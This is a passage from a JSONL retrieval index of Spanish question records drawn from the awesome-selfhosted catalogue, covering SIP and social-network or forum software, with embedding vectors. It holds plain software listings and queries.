-0.12591, -0.02479, 0.0688, -0.02992, -0.02891, 0.01394, 0.08357, -0.05619, -0.03579, 0.0706, -0.09088, -0.0045, 0.02677, -0.05357, -0.06705, 0.04463, 0.01432, -0.01535, -0.04986, 0.05534, -0.0649, 0.03261, -0.0337, -0.00864, 0.03943, 0.11605, -0.01318, 0.11792, 0.02592, 0.00535, -0.04755, -0.00755, 0.03361, -0.02413, -0.0715, -0.00527, -0.00157, -0.09261, 0.00639, 0.05727, 0.04281, 0.02981, 0.03104, 0.08333, 0.01953, -0.05475, 0.07617, -0.06739, -0.05063, -0.00232, 0.01387, -0.04008, -0.01539, 0.01177, 0.01104, 0.05164, 0.04312, 0.06397, 0.02543, -0.00888, -0.03608, 0.02371, -0.04136, 0.01201, -0.05127, -0.07233, 0.01639, -0.06005, -0.00507, 0.01032, 0.02722, -0.04813, -0.07442, -0.0735, 0.02137, 0.08491, -0.00481, -0.00303, -0.05475, -0.08847, -0.05888, 0.0135, -0.03153, -0.10972, -0.05141, 0.04871, 0.01642, -0.01147, -0.01126, 0.00047]} +{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: SIPCAPTURE Homer β€” Troubleshooting and monitoring VoIP calls [AGPL-3.0, Nodejs/Go/Docker]. Wazo β€” Full-featured IPBX solution built atop Asterisk with integrated Web administration interface and REST-ful API [GPL-3.0, Python]. Yeti-Switch β€” Transit class4 softswitch(SBC) with integrated billing and routing engine and REST API [GPL-2.0, C++/Ruby].", "indexar": "cual es una alternativa libre a las soluciones de conmutadores (softswitch) tradicionales?", "v": [-0.10813, -0.03631, -0.13451, 0.04208, -0.02476, 0.00736, -0.09951, -0.11777, -0.03573, -0.04939, -0.04588, -0.122, 0.01194, 0.04379, 0.04715, -0.06765, 0.03687, -0.16589, 0.04392, 0.0206, 0.01534, -0.08808, -0.1342, -0.17591, 0.00248, -0.02464, 0.13057, 0.1205, -0.04628, 0.09821, 0.02517, 0.0401, 0.08991, 0.06554, 0.00193, 0.00625, 0.02361, 0.01117, -0.00424, -0.0473, 0.08715, -0.12282, -0.09077, 0.01114, 0.03837, -0.05615, -0.12259, 0.01089, 0.01059, 0.01616, -0.10115, -0.014, -0.03785, -0.01562, 0.02756, -0.08077, 0.14804, -0.05349, -0.00814, -0.03938, -0.14911, 0.14563, 0.06917, -0.05235, 0.0879, 0.03537, -0.13016, -0.00804, -0.03553, 0.07567, 0.0406, 0.02586, 0.03256, 0.01017, -0.08846, 0.11495, -0.14079, 0.00544, 0.01622, 0.05646, 0.05311, -0.04364, 0.07107, 0.03305, -0.02667, -0.03004, 0.04479, -0.15358, 0.00886, -0.06934, -0.00751, -0.00533, 0.03518, 0.16602, 0.08842, -0.1268, 0.07669, 0.07641, -0.03737, 0.09311, 0.01738, 0.05695, -0.14026, -0.02573, -0.05118, -0.1205, 0.06602, -0.02108, -0.08872, 0.01585, -0.03224, 0.07396, 0.01791, 0.06394, -0.06044, -0.00515, -0.09026, -0.0144, 0.06293, 0.06181, -0.01725, -0.02102, 0.02171, -0.04835, 0.01663, 0.05689, 0.08871, 0.03024, -0.08327, 0.01314, 0.09857, -0.08398, -0.05191, -0.05537, -0.0974, 0.01503, 0.14303, 0.00791, 0.07564, 0.04211, 0.10397, 0.06965, 0.0165, -0.01702, 0.12493, -0.00675, 0.04175, -0.00826, -0.05613, 0.00486, -0.03668, 0.01107, 0.02968, 0.06591, -0.05645, 0.05416, -0.05373, 0.01327, -0.07661, 0.11236, 0.00789, -0.03549, -0.0004, -0.00808, -0.0419, 0.00403, -0.03686, 0.01877, -0.05371, -0.02443, -0.00156, 0.08118, -0.01017, -0.04847, 0.03821, -0.02395, -0.04848, -0.08774, 0.09196, -0.06142, 0.00693, 0.00669, -0.07357, -0.01025, 0.04754, -0.01932, -0.06396, 0.00952, 0.01015, 0.05098, -0.00794, -0.01607, -0.11095, -0.08265, -0.01753, 0.04584, -0.00845, -0.03773, -0.07461, -0.04796, -0.0457, 0.07799, -0.01839, -0.08276, -0.04389, 0.0325, -0.04545, 0.04556, -0.00239, 0.06849, -0.02542, -0.00437, 0.05853, 0.03096, -0.00425, -0.01655, -0.0229, -0.0427, 0.01574, 0.03671, 0.0127, 0.03495, 0.0513, 0.023, -0.02411, 0.03031, 0.08099, 0.05679, -0.05621, -0.02807, 0.02381, 0.00449, -0.03421, 0.02727, -0.00501, -0.00737, -0.03852, -0.01976, -0.04524, 0.02019, 0.02795, 0.02922, -0.02597, -0.01114, -0.03714, 0.02073, -0.08483, -0.03133, -0.03258, -0.04527, -0.05649, 0.05658, 0.04934, -0.0052, -0.04594, -0.01647]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Akkoma β€” Federated microblogging server with Mastodon, GNU social, and ActivityPub compatibility [AGPL-3.0, Elixir/Docker]. Answer β€” Knowledge-based community software. You can use it to quickly build your Q&A community for product technical support, customer support, user communication, and more [Apache-2.0, Docker/Go]. Artalk β€” Comment system built in Golang, providing a lightweight and highly customizable solution for adding comments to your website [MIT, Go/Docker]. AsmBB β€” Fast, SQLite-powered forum engine written in ASM [EUPL-1.2, Assembly]. BuddyPress β€” Powerful plugin that takes your WordPress.org powered site beyond the blog with social-network features like user profiles, activity streams, user groups, and more [GPL-2.0, PHP]. Coral β€” A better commenting experience from Vox Media [Apache-2.0, Docker/Nodejs]. diaspora* β€” Distributed social networking server [AGPL-3.0, Ruby]. Discourse β€” Advanced forum / community solution based on Ruby and JS [GPL-2.0, Docker].", "indexar": "quΓ© servidor de microblogging federado me sirve para mi comunidad tΓ©cnica?", "v": [-0.10204, 0.0033, -0.13431, -0.14551, -0.04694, -0.13532, -0.13237, -0.06874, -0.02511, -0.12571, -0.12287, 0.00597, 0.04746, -0.09369, 0.15214, -0.01412, 0.21224, -0.16106, 0.20648, -0.04902, 0.03469, 0.01854, 0.04022, -0.08138, -0.01252, -0.13352, 0.06754, -0.05968, -0.11423, -0.06067, 0.12973, 0.02936, 0.02106, 0.03713, 0.03214, 0.00593, 0.054, 0.11285, -0.12713, 0.00928, -0.06032, -0.09307, -0.0715, -0.1049, 0.08154, -0.06553, 0.06804, -0.08764, 0.01863, 0.13193, -0.04875, -0.04742, -0.02124, 0.06129, -0.1062, 0.0524, 0.03696, -0.21426, 0.00562, -0.02257, -0.16924, -0.0644, 0.00852, -0.05465, 0.03571, -0.06972, -0.05569, -0.02103, -0.00764, 0.04746, -0.03563, -0.0323, 0.03378, -0.17014, -0.13529, 0.12444, 0.04218, 0.03313, 0.12924, 0.03101, 0.01636, 0.08051, -0.06284, 0.06417, -0.03159, -0.01551, 0.01287, -0.02908, 0.08023, -0.03265, 0.04318, 0.06361, -0.08519, -0.07402, 0.02236, 0.00077, 0.03748, 0.03604, 0.02802, 0.04354, 0.06328, 0.05799, -0.03278, -0.01562, -0.00021, 0.06139, 0.04868, -0.06929, -0.00954, -0.06037, 0.1133, 0.05167, -0.00091, 0.03406, -0.0397, -0.04775, -0.02279, -0.05516, 0.07856, 0.08013, -0.03306, 0.00999, 0.07148, -0.0414, 0.00171, -0.05068, -0.00765, 0.00843, -0.01607, 0.01874, -0.01264, -0.03862, -0.07656, -0.00435, 0.01645, 0.03638, 0.09213, -0.0513, -0.08212, -0.03897, 0.03465, -0.00536, -0.06283, -0.0407, 0.0557, -0.03043, 0.10353, -0.10385, -0.04503, -0.03234, 0.01174, -0.06383, -0.08546, -0.04725, -0.06378, -0.04396, 0.06005, -0.07715, -0.03027, 0.02973, -0.02907, -0.00398, 0.08615, -0.05137, -0.00907, 0.01427, 0.00987, -0.00157, 0.03089, 0.02289, -0.04152, 0.04202, -0.01552, -0.01832, 0.06562, 0.02879, -0.05977, -0.03765, -0.03759, 0.04669, -0.0466, 0.01374, 0.00527, 0.03233, 0.012, 0.04456, -0.00651, 0.04614, 0.05187, -0.00593, 0.05965, -0.06957, -0.04029, 0.02769, 0.02072, -0.05149, -0.02926, -0.07678, -0.04053, -0.07104, 0.00573, 0.01716, -0.0254, 0.02637, -0.03354, -0.01596, -0.02553, -0.05567, -0.01694, 0.04707, 0.03695, -0.00821, 0.05686, 0.00905, 0.01113, 0.02054, 0.05791, 0.0002, 0.00507, -0.05437, 0.03533, -0.0226, 0.0563, 0.0067, -0.00657, -0.00166, -0.02646, -0.02495, 0.02465, -0.05349, -0.00623, -0.01869, -0.04486, 0.02144, -0.01226, -0.04446, 0.011, -0.02819, -0.01582, -0.04485, 0.00493, 0.04972, 0.02964, -0.0437, -0.00438, -0.02387, 0.00945, -0.02214, -0.07214, -0.03114, 0.03128, -0.04503, 0.05342, -0.03281, 0.0525, 0.02794]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Akkoma β€” Federated microblogging server with Mastodon, GNU social, and ActivityPub compatibility [AGPL-3.0, Elixir/Docker]. Answer β€” Knowledge-based community software. You can use it to quickly build your Q&A community for product technical support, customer support, user communication, and more [Apache-2.0, Docker/Go]. Artalk β€” Comment system built in Golang, providing a lightweight and highly customizable solution for adding comments to your website [MIT, Go/Docker]. AsmBB β€” Fast, SQLite-powered forum engine written in ASM [EUPL-1.2, Assembly]. BuddyPress β€” Powerful plugin that takes your WordPress.org powered site beyond the blog with social-network features like user profiles, activity streams, user groups, and more [GPL-2.0, PHP]. Coral β€” A better commenting experience from Vox Media [Apache-2.0, Docker/Nodejs]. diaspora* β€” Distributed social networking server [AGPL-3.0, Ruby]. Discourse β€” Advanced forum / community solution based on Ruby and JS [GPL-2.0, Docker].", "indexar": "con quΓ© puedo montar un sistema de preguntas y respuestas rΓ‘pido para el soporte al cliente?", "v": [0.00748, 0.18622, -0.11663, -0.10244, -0.10535, -0.07483, -0.02256, -0.05313, -0.12293, -0.06498, -0.11379, -0.04557, 0.05587, -0.0556, 0.05084, -0.04249, 0.01763, -0.01541, 0.04671, 0.0349, 0.06272, -0.17839, -0.16489, -0.11332, -0.06631, 0.11993, 0.10274, -0.06402, -0.11353, 0.03628, 0.05382, -0.03331, -0.07752, 0.10467, -0.0825, -0.03232, 0.01956, 0.08853, 0.04437, 0.03125, -0.03245, -0.16931, 0.11845, -0.0183, 0.0699, -0.0155, -0.0001, -0.12459, 0.02369, 0.02306, -0.03733, -0.13978, -0.08085, -0.09721, -0.09412, -0.08947, 0.16475, -0.11607, 0.11188, -0.06165, -0.00581, 0.0661, 0.02437, 0.05929, 0.08096, -0.04188, 0.01734, -0.04337, -0.0227, -0.02693, -0.08488, -0.05824, 0.02848, 0.0227, -0.02355, 0.08893, 0.03214, 0.0209, 0.00788, 0.10271, 0.02666, 0.06282, -0.0626, 0.01373, -0.00111, 0.04424, -0.05942, -0.03872, -0.08931, -0.01338, 0.043, 0.0272, 0.06255, 0.04483, -0.03167, -0.14735, -0.04884, 0.04031, -0.02011, 0.02725, -0.07591, -0.06821, -0.0631, 0.10623, -0.06319, -0.07439, 0.094, -0.14443, -0.04063, -0.04204, -0.02331, 0.05124, -0.15442, -0.09276, -0.04984, -0.07601, 0.01656, 0.06296, -0.03957, 0.11047, -0.00663, 0.1434, 0.08531, -0.02933, 0.09047, -0.05074, 0.12474, 0.06927, 0.00266, -0.01937, 0.01448, -0.03948, -0.04963, -0.00864, 0.08147, 0.0203, 0.02765, 0.04078, -0.01351, -0.01762, 0.05215, -0.03107, -0.02335, -0.09259, 0.02722, -0.00842, 0.05332, -0.09206, -0.01371, -0.00106, 0.02063, 0.05543, 0.0511, -0.00693, -0.05213, -0.08223, 0.0697, -0.06214, 0.06087, 0.04123, 0.02424, 0.03786, 0.05235, 0.04269, -0.03177, -0.06244, -0.05095, -0.02982, 0.07106, 0.04698, -0.01169, 0.04848, 0.02778, -0.0647, 0.05821, 0.02268, -0.0266, -0.05861, 0.03634, -0.02267, -0.03936, 0.03021, 0.01626, 0.06048, -0.03167, -0.04223, 0.048, -0.01752, 0.01065, 0.03029, 0.04472, -0.00528, -0.02094, -0.0137, 0.00571, -0.01842, -0.02511, 0.00451, -0.01918, -0.0001, -0.05119, -0.00074, 0.00901, -0.02116, -0.03104, 0.04791, -0.00391, 0.11076, 0.09074, -0.00361, 0.00105, 0.02898, 0.12533, 0.00099, -0.04813, -0.01487, -0.05554, 0.0431, -0.04484, 0.00457, 0.04944, 0.0446, 0.03582, 0.05714, 0.00918, 0.04589, 0.03296, 0.0149, 0.00104, 0.03044, 0.03261, -0.06446, -0.01679, -0.02713, 0.02404, -0.01537, 0.00401, -0.02679, -0.02976, 0.00215, 0.08022, 0.06432, -0.02818, -0.00691, -0.02625, 0.01175, -0.01495, 0.01638, -0.04388, -0.08978, -0.05358, -0.00044, -0.01898, -0.04188, 0.02111, -0.00303]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Akkoma β€” Federated microblogging server with Mastodon, GNU social, and ActivityPub compatibility [AGPL-3.0, Elixir/Docker]. Answer β€” Knowledge-based community software. You can use it to quickly build your Q&A community for product technical support, customer support, user communication, and more [Apache-2.0, Docker/Go]. Artalk β€” Comment system built in Golang, providing a lightweight and highly customizable solution for adding comments to your website [MIT, Go/Docker]. AsmBB β€” Fast, SQLite-powered forum engine written in ASM [EUPL-1.2, Assembly]. BuddyPress β€” Powerful plugin that takes your WordPress.org powered site beyond the blog with social-network features like user profiles, activity streams, user groups, and more [GPL-2.0, PHP]. Coral β€” A better commenting experience from Vox Media [Apache-2.0, Docker/Nodejs]. diaspora* β€” Distributed social networking server [AGPL-3.0, Ruby]. Discourse β€” Advanced forum / community solution based on Ruby and JS [GPL-2.0, Docker].", "indexar": "cuΓ‘l es una alternativa libre a Mastodon que funcione con Docker?", "v": [-0.02324, 0.01315, -0.08522, 0.18167, -0.08731, -0.03603, -0.02189, -0.04485, -0.2071, -0.06672, -0.07986, -0.2043, 0.01977, -0.05725, 0.1114, -0.16604, 0.1312, -0.12632, 0.01618, 0.00764, -0.07874, -0.11213, -0.04373, -0.10384, 0.0723, -0.07672, -0.04276, -0.03954, -0.16967, 0.05373, 0.1271, -0.03288, 0.02689, -0.0719, 0.03798, -0.09602, 0.0693, 0.07085, 0.16059, 0.03122, 0.07075, -0.00804, -0.11346, 0.08503, -0.10621, -0.03603, -0.02616, -0.01477, 0.07338, 0.1493, -0.04124, -0.0568, 0.03627, 0.07137, 0.0194, 0.00248, 0.0685, -0.06293, 0.06765, 0.01397, -0.03132, -0.02994, 0.04401, -0.05809, 0.10912, -0.04114, -0.03574, -0.05421, 0.02742, 0.10804, -0.03327, -0.00451, 0.00189, 0.09274, -0.04296, 0.06915, -0.01797, 0.03851, -0.00138, 0.07585, 0.07628, -0.06507, -0.01334, 0.04794, -0.01979, 0.00091, 0.13526, -0.16975, -0.03337, -0.04299, 0.10401, 0.05542, 0.04123, 0.16542, -0.00877, -0.0781, -0.04354, 0.0832, 0.00746, 0.01959, 0.08581, 0.08205, -0.09997, -0.00616, 0.04987, -0.00845, 0.01298, 0.00652, -0.06935, 0.02137, -0.05461, 0.04936, -0.05055, -0.07071, -0.13622, -0.00429, -0.13494, 0.01475, 0.01454, -0.01787, 0.0297, 0.03581, -0.05253, -0.04288, 0.03862, 0.04084, 0.10003, 0.06837, -0.01057, 0.03818, 0.05732, -0.03965, -0.08333, -0.051, -0.11171, 0.02515, 0.01812, 0.02667, 0.00591, -0.00793, -0.01657, 0.02125, 0.06007, 0.021, 0.043, -0.02293, 0.07623, 0.00406, 0.00123, 0.03732, -0.00269, -0.01757, 0.00266, 0.0783, -0.04768, 0.00181, 0.04329, -0.01646, 0.01141, 0.12134, -0.01602, -0.05445, -0.00345, -0.0141, -0.02523, 0.00057, -0.02971, -0.08604, -0.07939, -0.02165, -0.02772, 0.04621, 0.03792, -0.06121, 0.04282, -0.05128, -0.01056, -0.0471, 0.0803, -0.00959, 0.01823, 0.00337, -0.03904, 0.01363, 0.00178, -0.06903, -0.02993, -0.00707, -0.01184, 0.00784, 0.00913, 0.02887, 0.00404, -0.09554, -0.00192, -0.01625, 0.05401, -0.09526, -0.01512, 0.02676, -0.0802, -0.03587, -0.01606, 0.01654, -0.0011, 0.04195, -0.02888, 0.06002, 0.01633, 0.04319, 0.00985, 0.00475, 0.10281, 0.00326, -0.0584, 0.05671, 0.04348, -0.00695, 0.01179, -0.04238, 0.07975, 0.01081, -0.00745, 0.00888, 0.00435, 0.0505, 0.01295, 0.05465, -0.0014, 0.02155, 0.04126, -0.00294, 0.02351, -0.01537, -0.02098, -0.01032, -0.00914, 0.07373, -0.03218, -0.03992, 0.06779, 0.04098, -0.0168, -0.03128, -0.06431, 0.0406, -0.09706, -0.00404, 0.01699, -0.05518, -0.04196, 0.1075, 0.02493, 0.03991, 0.0026, -0.00251]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Elgg β€” Powerful open source social networking engine [GPL-2.0, PHP]. Enigma 1/2 BBS β€” Enigma 1/2 is a modern, multi-platform BBS engine with unlimited \"callers\" and legacy DOS door game support [BSD-2-Clause, Shell/Docker/Nodejs]. Flarum β€” Delightfully simple forums. Flarum is the next-generation forum software that makes online discussion fun again [MIT, PHP]. Friendica β€” Social Communication Server [AGPL-3.0, PHP]. GoToSocial β€” ActivityPub federated social network server implementing the Mastodon client API [AGPL-3.0, Docker/Go]. Habitat β€” A Platform for Local Communities [AGPL-3.0, Docker]. Hatsu β€” Bridge that interacts with Fediverse on behalf of your static site [AGPL-3.0, Docker/Rust]. Hubzilla β€” Decentralized identity, privacy, publishing, sharing, cloud storage, and communications/social platform [MIT, PHP]. HumHub β€” Flexible kit for private social networks [AGPL-3.0, PHP]. Iceshrimp.NET β€” Federated microblogging server that communicates over ActivityPub [EUPL-1.2, .NET/C#/Docker].", "indexar": "quΓ© programa sirve para montar una red social comunitaria local sin depender de internet centralizado", "v": [0.1422, 0.07184, -0.12885, -0.08407, -0.07869, -0.1708, -0.01302, -0.02826, -0.11738, -0.09476, -0.05713, -0.03836, -0.05762, -0.16131, 0.07703, 0.02006, -2e-05, -0.07125, 0.13183, -0.07837, -0.07356, -0.0623, 0.07367, -0.01444, 0.02485, 0.01313, 0.0458, -0.1515, -0.01955, 0.09547, 0.10716, 0.06449, 0.03733, 0.09709, -0.04765, -0.01722, 0.0523, 0.02381, -0.04825, -0.12731, 0.05874, -0.0111, -0.11227, 0.0014, 0.03958, 0.12383, -0.02482, -0.10869, -0.0467, 0.02932, -0.09976, -0.0277, -0.10174, -0.06372, -0.02064, -0.0047, 0.00156, -0.08335, -0.06341, -0.03387, -0.10559, 0.04807, -0.03254, 0.04619, 0.02915, 0.01878, -0.02964, 0.08851, -0.06778, 0.02161, 0.01713, -0.00589, 0.0162, -0.05755, 0.0426, 0.04736, -0.00883, -0.00324, 0.10671, -0.11978, 0.06081, 0.03699, 0.07725, 0.06463, -0.03248, -0.0236, 0.11729, -0.1464, -0.00939, -0.01653, 0.07039, 0.05652, -0.01422, -0.036, -0.01976, -0.07696, 0.05671, 0.04298, 0.01088, -0.00926, 0.00171, -0.01758, -0.10858, 0.07932, 0.03541, -0.02283, 0.07478, 0.009, 0.01218, -0.0266, 0.09152, -0.03514, -0.01785, -0.0321, -0.03241, -0.02577, -7e-05, 0.12244, 0.05675, -0.02733, -0.03006, 0.03108, 0.01381, -0.09662, 0.00988, 0.02643, 0.0204, 0.09336, 0.01984, 0.10222, -0.06811, 0.0381, 0.02219, -0.08001, -0.05648, -0.05039, -0.03505, -0.10684, -0.03669, -0.07125, 0.05688, -0.00199, -0.061, -0.08706, 0.04568, 0.06672, 0.10576, -0.10151, -0.01818, 0.0486, -0.02336, 0.07304, -0.02313, -0.01359, -0.07099, 0.00749, -0.01435, -0.01202, -0.00778, 0.08337, -0.00138, -0.05976, -0.02486, -0.06077, 0.0048, -0.00778, -0.03769, 0.04841, 0.13486, 0.01706, -0.04027, 0.02584, -0.0107, -0.09812, 0.04729, -0.04732, -0.04786, -0.09636, -0.00091, -0.00583, -0.09625, 0.07037, -0.0011, 0.051, 0.00559, 0.02374, -0.14969, -0.03783, 0.00828, -0.04389, -0.0407, -0.09434, -0.02276, 0.07395, 0.07138, -0.05974, -0.06947, -0.01175, 0.05387, -0.07628, -0.11386, 0.03835, -0.01143, 0.01297, -0.03425, 0.10357, 0.02643, 0.00637, -0.01139, 0.17872, -0.05561, -0.08513, 0.03991, -0.00568, -0.04262, -0.02916, 0.06115, -0.07191, 0.00163, 0.02134, 0.01364, -0.02635, 0.08471, 0.07948, 0.02482, 0.0003, 0.0759, 0.04334, 0.04875, 0.0433, -0.02975, 0.00145, -0.0587, -0.02184, 0.01469, -0.05629, 0.03979, 0.00691, -0.06772, -0.06581, -0.00826, 0.05247, 0.00701, -0.00451, 0.00237, -0.07343, -0.11955, 0.0287, 0.04528, -0.03004, -0.06147, 0.0167, 0.0315, -0.00032, 0.0141, 0.05224]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Elgg β€” Powerful open source social networking engine [GPL-2.0, PHP]. Enigma 1/2 BBS β€” Enigma 1/2 is a modern, multi-platform BBS engine with unlimited \"callers\" and legacy DOS door game support [BSD-2-Clause, Shell/Docker/Nodejs]. Flarum β€” Delightfully simple forums. Flarum is the next-generation forum software that makes online discussion fun again [MIT, PHP]. Friendica β€” Social Communication Server [AGPL-3.0, PHP]. GoToSocial β€” ActivityPub federated social network server implementing the Mastodon client API [AGPL-3.0, Docker/Go]. Habitat β€” A Platform for Local Communities [AGPL-3.0, Docker]. Hatsu β€” Bridge that interacts with Fediverse on behalf of your static site [AGPL-3.0, Docker/Rust]. Hubzilla β€” Decentralized identity, privacy, publishing, sharing, cloud storage, and communications/social platform [MIT, PHP]. HumHub β€” Flexible kit for private social networks [AGPL-3.0, PHP]. Iceshrimp.NET β€” Federated microblogging server that communicates over ActivityPub [EUPL-1.2, .NET/C#/Docker].", "indexar": "con quΓ© puedo crear un foro o plataforma de discusiones que permita compartir identidad y privacidad de forma descentralizada", "v": [-0.00744, 0.16359, -0.11212, -0.11547, 0.05429, -0.18316, 0.02784, -0.10022, -0.1139, -0.13898, 0.0417, -0.06627, 0.01367, -0.01707, -0.00304, 0.05802, 0.16077, 0.04666, 0.00867, -0.08526, -0.00749, -0.04171, -0.05856, -0.11691, -0.01769, -0.17608, 0.04278, -0.05233, -0.02935, -0.04024, 0.04264, -0.06977, -0.01147, 0.06079, -0.00415, -0.10539, 0.06389, 0.07034, -0.02691, 0.02268, -0.03655, 0.1249, 0.01092, 0.11145, 0.11341, 0.09277, -0.11495, -0.03234, 0.00808, -0.0102, -0.04823, -0.05538, -0.06814, -0.03456, 0.02749, -0.09577, 0.13303, -0.08952, 0.16826, 0.06104, -0.15209, 0.07807, 0.09601, 0.05806, -0.04801, -0.06117, -0.01833, 0.03676, -0.0693, 0.216, 0.05845, -0.0497, -0.01426, -0.08685, 0.08602, -0.01365, -0.03618, -0.06044, -0.00711, -0.01255, 0.07997, 0.0103, -0.04555, -0.0162, -0.04006, -0.04912, 0.0445, -0.02798, -0.04843, -0.02365, -0.03273, -0.01396, -0.06702, -0.02721, 0.00134, -0.05198, 0.02803, 0.04841, -0.09627, -0.04383, 0.00057, 0.08293, -0.03298, 0.07758, -0.00147, -0.02292, 0.04, -0.11273, 0.07083, -0.04507, 0.05859, 0.0733, -0.01066, 0.01431, 0.03865, 0.04168, -0.12937, -0.00189, 0.08663, 0.05023, -0.02346, -0.05576, 0.00932, -0.09271, 0.08827, 0.03788, -0.06782, 0.09165, -0.01932, 0.0826, -0.07973, -0.0832, 0.00346, 0.00228, 0.06916, 0.00613, -0.024, -0.01792, 0.05085, -0.03974, 0.06985, 0.01679, -0.0355, -0.11876, 0.04717, -0.01065, -0.01454, -0.0795, -0.08374, 0.04961, -0.06266, 0.03468, 0.0177, 0.00516, -0.08843, 0.03493, -0.0456, -0.09385, -0.00865, 0.05169, -0.0173, 0.07365, -0.02214, -0.01605, 0.02564, 0.02532, -0.00694, -0.01706, 0.0866, -0.01169, -0.01284, 0.03388, 0.02364, -0.09259, 0.12804, -0.03066, -0.0569, -0.09646, 0.00891, -0.01858, 0.00902, -0.02259, -0.04334, 0.01031, -0.00302, -0.02313, 0.02216, -0.00119, 0.02291, 0.07157, -0.04571, 0.04469, -0.05853, 0.05899, 0.02334, -0.07359, -0.02418, -0.00401, 0.02661, -0.02699, -0.03752, 0.05838, -0.00222, -0.01848, -0.03982, 0.01821, -0.06189, -0.05233, 0.01285, -0.01497, 0.03712, -0.03779, 0.09082, -0.12388, -0.03038, 0.01986, 0.03015, -0.0734, 0.01054, -0.04107, -0.02517, 0.06562, 0.04672, -0.0133, 0.05051, 0.07141, 0.05985, 0.02104, 0.02515, 0.01804, 0.05125, 0.0374, 0.00258, -0.05209, 0.08993, 0.03556, 0.00337, -0.01311, -0.04741, -0.04934, -0.03657, 0.03425, -0.03127, -0.03113, -0.00463, -0.02621, -0.06892, 0.02743, -0.03353, -0.13113, -0.01982, -0.0185, 0.07775, -0.00934, 0.00214, -0.03386]} +{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Elgg β€” Powerful open source social networking engine [GPL-2.0, PHP]. Enigma 1/2 BBS β€” Enigma 1/2 is a modern, multi-platform BBS engine with unlimited \"callers\" and legacy DOS door game support [BSD-2-Clause, Shell/Docker/Nodejs]. Flarum β€” Delightfully simple forums. Flarum is the next-generation forum software that makes online discussion fun again [MIT, PHP]. Friendica β€” Social Communication Server [AGPL-3.0, PHP]. GoToSocial β€” ActivityPub federated social network server implementing the Mastodon client API [AGPL-3.0, Docker/Go]. Habitat β€” A Platform for Local Communities [AGPL-3.0, Docker]. Hatsu β€” Bridge that interacts with Fediverse on behalf of your static site [AGPL-3.0, Docker/Rust]. Hubzilla β€” Decentralized identity, privacy, publishing, sharing, cloud storage, and communications/social platform [MIT, PHP]. HumHub β€” Flexible kit for private social networks [AGPL-3.0, PHP]. Iceshrimp.NET β€” Federated microblogging server that communicates over ActivityPub [EUPL-1.2, .NET/C#/Docker].", "indexar": "cuΓ‘l es la alternativa libre a Mastodon para gestionar comunidades con almacenamiento en la nube", "v": [-0.02746, -0.03804, -0.04896, -0.10848, -0.17459, -0.02554, -0.09076, 0.05714, -0.26299, -0.07962, -0.16141, -0.17163, -0.0093, 0.09452, -0.04802, 0.00018, 0.09384, -0.0542, -0.01288, 0.07496, -0.08533, -0.02762, -0.0255, 0.02069, -0.01742, -0.08097, 0.05408, -0.05305, -0.06364, 0.04528, 0.03114, -0.0103, -0.0367, -0.0099, 0.00094, 0.00092, 0.07847, 0.03465, -0.06089, -0.08087, -0.02992, -0.01956, -0.08574, 0.11577, -0.02603, -0.09232, -0.05192, -0.0114, 0.05424, 0.04826, -0.13163, -0.01322, 0.00285, 0.01969, 0.10302, 0.01104, 0.0732, -0.10072, -0.01259, 0.00128, -0.21626, 0.05444, 0.03307, -0.05012, 0.11064, -0.00404, -0.08564, 0.08646, -0.13609, 0.16015, 0.05482, -0.0167, 0.02626, 3e-05, -0.07309, 0.01372, 0.08489, 0.03039, -0.06377, 0.04595, 0.02996, 0.04539, 0.02918, 0.00634, -0.0717, -0.0575, 0.02718, -0.14794, 0.02228, 0.0267, 0.07627, -0.04885, 0.06288, 0.07164, 0.04211, 0.01014, 0.00059, 0.10704, -0.06754, 0.03879, 0.02144, 0.13367, -0.06895, 0.03559, 0.02316, 0.04161, 0.04891, -0.05625, -0.04182, 0.03023, 0.09313, 0.02286, 0.07655, 0.01895, -0.03479, 0.01039, 0.05518, -0.04938, 0.03181, 0.04035, 0.00233, -0.05259, 0.04208, -0.03225, 0.13991, 0.05566, 0.08078, 0.01815, -0.08493, 0.04663, -0.06855, -0.02521, -0.00245, 0.01849, -0.03884, -0.01559, -0.08353, -0.08547, 0.00859, -0.03095, -0.05607, -0.01789, -0.0039, 0.01128, 0.10586, -0.10246, 0.03479, -0.01312, 0.07623, -0.00523, 0.03854, -0.04836, -0.05236, -0.01374, -0.0475, 0.04524, -0.00543, -0.02735, -0.12073, 0.00291, 